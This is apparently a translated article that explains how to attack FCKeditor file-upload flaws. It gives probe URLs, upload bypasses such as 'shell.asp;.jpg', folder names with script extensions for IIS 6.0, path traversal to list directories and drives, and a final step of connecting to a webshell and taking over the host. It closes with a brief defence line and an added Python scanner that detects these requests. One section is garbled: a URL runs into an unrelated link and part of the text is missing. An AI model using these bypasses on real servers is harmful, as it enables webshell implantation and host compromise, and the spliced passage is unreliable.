Why FCKeditor shows a white screen after an image upload

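I. About FCKeditor

FCKeditor is a web-based text editor used in many content management systems.

This article briefly outlines the approach to attacking through FCKeditor upload vulnerabilities and collects the operations that may be used.

II. Attack approach

1. Check the FCKeditor version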

http://127.0.0.1/fckeditor/editor/dialog/fck_about.html

http://127.0.0.1/FCKeditor/_whatsnew.html

2. Test the upload points

FCKeditor/editor/filemanager/browser/default/connectors/test.html

FCKeditor/editor/filemanager/upload/test.html

FCKeditor/editor/filemanager/connectors/test.html

FCKeditor/editor/filemanager/connectors/uploadtest.html

FCKeditor/_samples/default.html

FCKeditor/_samples/asp/sample01.asp

FCKeditor/_samples/asp/sample02.asp

FCKeditor/_samples/asp/sample03.asp

FCKeditor/_samples/asp/sample04.asp

FCKeditor/editor/fckeditor.htm

FCKeditor/editor/fckdialog.html

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp#Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php#Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx#Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp#Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html#Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/connector.php

FCKeditor/editor/filemanager/browser/default/browser.html#Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html#Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx

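FCKeditor/editor/filemanager/browser/default/browser.html#Type=Image&Connector=http://d.aap5.com/20220723/d=70130000000liBh&internal=true file, the file name is automatically changed to shell_asp;.jpg. A file with the same name can then be uploaded again, and the file name becomes shell.asp;(1).jpg

3.2.2 Bypass by submitting shell.php + space

The trailing space is only supported on Windows systems; Linux systems do not support it. Submitting shell.php followed by a space bypasses the file name restriction.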

3.3 Bypassing the folder restriction on IIS 6.0

Fckeditor/editor/filemanager/connectors/asp/connector.asp#Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp

FCKeditor/editor/filemanager/connectors/asp/connector.asp#Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp#Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

3.4 File parsing restriction

On the file upload page of the FCKeditor editor, create a folder such as 1.asp, then upload an image webshell file into that folder to obtain its shell.

http://127.0.0.1/images/upload/201806/image/1.asp/1.jpg

4. Directory listing

4.1 FCKeditor/editor/fckeditor.html

FCKeditor/editor/fckeditor.html cannot upload files itself. Click the upload image button and then choose to browse the server to jump to the page where files can be uploaded; files that have already been uploaded can be viewed there.

4.2 View the site directory from the returned XML

http://127.0.0.1/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx#Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp

4.3 Get the current folder

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx#Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php#Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp#Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

4.4 Browse files on drive E

/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx#Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/

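5. Connect to the trojan

Once the trojan is being parsed, use any of various tools to connect to it and obtain the webshell. At this point, the process of uploading a file through FCKeditor and attacking is complete.

III. Other

After a webshell has been obtained, a great many operations are possible and privilege escalation becomes convenient; taking over the host is not difficult.

To defend against this vulnerability, delete all of the upload points and restrict directory access.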
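To check whether the connector requests and upload paths listed above have already reached a server before the upload points are removed, the following added example (not part of the original article and not FCKeditor code) scans web access logs for them. It assumes the connector parameters appear in the logged query string; the function names and finding labels are hypothetical, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

SCRIPT_EXT = re.compile(r"\.(asp|aspx|php|jsp)\b", re.I)
CONNECTOR = re.compile(r"/filemanager/(.*/)?connectors/.*/connector\.(asp|aspx|php|jsp)$", re.I)
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    params = {k.lower(): v[0] for k, v in parse_qs(parts.query).items()}
    findings = []
    if CONNECTOR.search(path):
        folder = params.get("currentfolder", "")
        new_name = params.get("newfoldername", "")
        is_create = params.get("command", "").lower() == "createfolder"
        # Section 3.3: a folder whose name carries a script extension.
        if is_create and (SCRIPT_EXT.search(folder) or SCRIPT_EXT.search(new_name)):
            findings.append("createfolder-script-extension")
        # Sections 4.2 and 4.4: CurrentFolder uses ../ or a drive letter.
        if ".." in folder or re.match(r"[a-z]:", folder, re.I):
            findings.append("currentfolder-outside-upload-root")
    segments = [s for s in path.split("/") if s]
    # Section 3.4: a file requested from beneath a folder such as 1.asp.
    if any(SCRIPT_EXT.search(s) for s in segments[:-1]):
        findings.append("request-under-script-named-folder")
    # File names such as shell.asp;(1).jpg.
    if segments and re.search(r"\.(asp|aspx|php|jsp)\s*;", segments[-1], re.I):
        findings.append("semicolon-after-script-extension")
    return findings

def scan(log_lines):
    """Return [(line_number, findings)] for log lines with at least one finding."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        found = classify(match.group(1)) if match else []
        if found:
            hits.append((number, found))
    return hits

# Constructed access-log lines (common log format); addresses and timestamps are made up.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jun/2018:10:00:01 +0000] "GET /FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jun/2018:10:00:05 +0000] "GET /FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/ HTTP/1.1" 200 960',
    '198.51.100.7 - - [01/Jun/2018:10:00:09 +0000] "GET /images/upload/201806/image/1.asp/1.jpg HTTP/1.1" 200 45',
    '203.0.113.20 - - [01/Jun/2018:10:01:00 +0000] "GET /FCKeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ HTTP/1.1" 200 410',
]
```

Calling `scan(SAMPLE_LOG)` flags the first three constructed lines and leaves the ordinary folder listing on the fourth line unflagged.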
